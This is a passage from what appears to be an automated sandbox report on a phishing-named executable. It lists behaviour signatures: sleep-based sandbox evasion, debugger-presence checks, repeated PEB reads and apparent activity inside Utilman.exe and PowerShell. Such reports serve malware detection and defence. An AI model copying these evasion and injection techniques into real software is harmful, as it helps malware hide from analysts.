                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988 Thread sleep time: -43500s >= -30000s
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988 Thread sleep count: 49 > 30
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988 Thread sleep time: -49000s >= -30000s
                      Source: C:\Windows\SysWOW64\Utilman.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\Utilman.exe Code function: 7_2_0321C830 FindFirstFileW,FindNextFileW,FindClose, 7_2_0321C830
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\Utilman.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Code function: 5_2_00417D93 LdrLoadDll, 5_2_00417D93
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe Code function: 5_2_0198019F mov eax, dword ptr fs:[00000030h] 5_2_0198019F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E284 mov eax, dword ptr fs:[00000030h]5_2_0193E284
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01980283 mov eax, dword ptr fs:[00000030h]5_2_01980283
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01980283 mov eax, dword ptr fs:[00000030h]5_2_01980283
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01980283 mov eax, dword ptr fs:[00000030h]5_2_01980283
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov ecx, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019962A0 mov eax, dword ptr fs:[00000030h]5_2_019962A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D62D6 mov eax, dword ptr fs:[00000030h]5_2_019D62D6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A2C3 mov eax, dword ptr fs:[00000030h]5_2_0190A2C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019102E1 mov eax, dword ptr fs:[00000030h]5_2_019102E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019102E1 mov eax, dword ptr fs:[00000030h]5_2_019102E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019102E1 mov eax, dword ptr fs:[00000030h]5_2_019102E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F823B mov eax, dword ptr fs:[00000030h]5_2_018F823B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D625D mov eax, dword ptr fs:[00000030h]5_2_019D625D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906259 mov eax, dword ptr fs:[00000030h]5_2_01906259
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA250 mov eax, dword ptr fs:[00000030h]5_2_019BA250
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA250 mov eax, dword ptr fs:[00000030h]5_2_019BA250
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01988243 mov eax, dword ptr fs:[00000030h]5_2_01988243
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01988243 mov ecx, dword ptr fs:[00000030h]5_2_01988243
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FA250 mov eax, dword ptr fs:[00000030h]5_2_018FA250
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F826B mov eax, dword ptr fs:[00000030h]5_2_018F826B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B0274 mov eax, dword ptr fs:[00000030h]5_2_019B0274
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904260 mov eax, dword ptr fs:[00000030h]5_2_01904260
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904260 mov eax, dword ptr fs:[00000030h]5_2_01904260
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904260 mov eax, dword ptr fs:[00000030h]5_2_01904260
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E59C mov eax, dword ptr fs:[00000030h]5_2_0193E59C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01902582 mov eax, dword ptr fs:[00000030h]5_2_01902582
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01902582 mov ecx, dword ptr fs:[00000030h]5_2_01902582
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01934588 mov eax, dword ptr fs:[00000030h]5_2_01934588
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019245B1 mov eax, dword ptr fs:[00000030h]5_2_019245B1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019245B1 mov eax, dword ptr fs:[00000030h]5_2_019245B1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019805A7 mov eax, dword ptr fs:[00000030h]5_2_019805A7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019805A7 mov eax, dword ptr fs:[00000030h]5_2_019805A7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019805A7 mov eax, dword ptr fs:[00000030h]5_2_019805A7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019065D0 mov eax, dword ptr fs:[00000030h]5_2_019065D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A5D0 mov eax, dword ptr fs:[00000030h]5_2_0193A5D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A5D0 mov eax, dword ptr fs:[00000030h]5_2_0193A5D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E5CF mov eax, dword ptr fs:[00000030h]5_2_0193E5CF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E5CF mov eax, dword ptr fs:[00000030h]5_2_0193E5CF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019025E0 mov eax, dword ptr fs:[00000030h]5_2_019025E0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C5ED mov eax, dword ptr fs:[00000030h]5_2_0193C5ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C5ED mov eax, dword ptr fs:[00000030h]5_2_0193C5ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01996500 mov eax, dword ptr fs:[00000030h]5_2_01996500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908550 mov eax, dword ptr fs:[00000030h]5_2_01908550
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908550 mov eax, dword ptr fs:[00000030h]5_2_01908550
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193656A mov eax, dword ptr fs:[00000030h]5_2_0193656A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193656A mov eax, dword ptr fs:[00000030h]5_2_0193656A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193656A mov eax, dword ptr fs:[00000030h]5_2_0193656A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA49A mov eax, dword ptr fs:[00000030h]5_2_019BA49A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019344B0 mov ecx, dword ptr fs:[00000030h]5_2_019344B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198A4B0 mov eax, dword ptr fs:[00000030h]5_2_0198A4B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019064AB mov eax, dword ptr fs:[00000030h]5_2_019064AB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019004E5 mov ecx, dword ptr fs:[00000030h]5_2_019004E5
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938402 mov eax, dword ptr fs:[00000030h]5_2_01938402
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938402 mov eax, dword ptr fs:[00000030h]5_2_01938402
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938402 mov eax, dword ptr fs:[00000030h]5_2_01938402
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A430 mov eax, dword ptr fs:[00000030h]5_2_0193A430
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FC427 mov eax, dword ptr fs:[00000030h]5_2_018FC427
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE420 mov eax, dword ptr fs:[00000030h]5_2_018FE420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE420 mov eax, dword ptr fs:[00000030h]5_2_018FE420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE420 mov eax, dword ptr fs:[00000030h]5_2_018FE420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192245A mov eax, dword ptr fs:[00000030h]5_2_0192245A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA456 mov eax, dword ptr fs:[00000030h]5_2_019BA456
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F645D mov eax, dword ptr fs:[00000030h]5_2_018F645D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192A470 mov eax, dword ptr fs:[00000030h]5_2_0192A470
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192A470 mov eax, dword ptr fs:[00000030h]5_2_0192A470
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192A470 mov eax, dword ptr fs:[00000030h]5_2_0192A470
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198C460 mov ecx, dword ptr fs:[00000030h]5_2_0198C460
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A678E mov eax, dword ptr fs:[00000030h]5_2_019A678E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B47A0 mov eax, dword ptr fs:[00000030h]5_2_019B47A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019007AF mov eax, dword ptr fs:[00000030h]5_2_019007AF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190C7C0 mov eax, dword ptr fs:[00000030h]5_2_0190C7C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019807C3 mov eax, dword ptr fs:[00000030h]5_2_019807C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019047FB mov eax, dword ptr fs:[00000030h]5_2_019047FB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019047FB mov eax, dword ptr fs:[00000030h]5_2_019047FB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198E7E1 mov eax, dword ptr fs:[00000030h]5_2_0198E7E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019227ED mov eax, dword ptr fs:[00000030h]5_2_019227ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019227ED mov eax, dword ptr fs:[00000030h]5_2_019227ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019227ED mov eax, dword ptr fs:[00000030h]5_2_019227ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900710 mov eax, dword ptr fs:[00000030h]5_2_01900710
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01930710 mov eax, dword ptr fs:[00000030h]5_2_01930710
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C700 mov eax, dword ptr fs:[00000030h]5_2_0193C700
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197C730 mov eax, dword ptr fs:[00000030h]5_2_0197C730
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193273C mov eax, dword ptr fs:[00000030h]5_2_0193273C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193273C mov ecx, dword ptr fs:[00000030h]5_2_0193273C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193273C mov eax, dword ptr fs:[00000030h]5_2_0193273C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C720 mov eax, dword ptr fs:[00000030h]5_2_0193C720
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C720 mov eax, dword ptr fs:[00000030h]5_2_0193C720
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900750 mov eax, dword ptr fs:[00000030h]5_2_01900750
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942750 mov eax, dword ptr fs:[00000030h]5_2_01942750
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942750 mov eax, dword ptr fs:[00000030h]5_2_01942750
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198E75D mov eax, dword ptr fs:[00000030h]5_2_0198E75D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01984755 mov eax, dword ptr fs:[00000030h]5_2_01984755
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193674D mov esi, dword ptr fs:[00000030h]5_2_0193674D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193674D mov eax, dword ptr fs:[00000030h]5_2_0193674D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193674D mov eax, dword ptr fs:[00000030h]5_2_0193674D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908770 mov eax, dword ptr fs:[00000030h]5_2_01908770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904690 mov eax, dword ptr fs:[00000030h]5_2_01904690
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904690 mov eax, dword ptr fs:[00000030h]5_2_01904690
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019366B0 mov eax, dword ptr fs:[00000030h]5_2_019366B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C6A6 mov eax, dword ptr fs:[00000030h]5_2_0193C6A6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0193A6C7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A6C7 mov eax, dword ptr fs:[00000030h]5_2_0193A6C7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019806F1 mov eax, dword ptr fs:[00000030h]5_2_019806F1
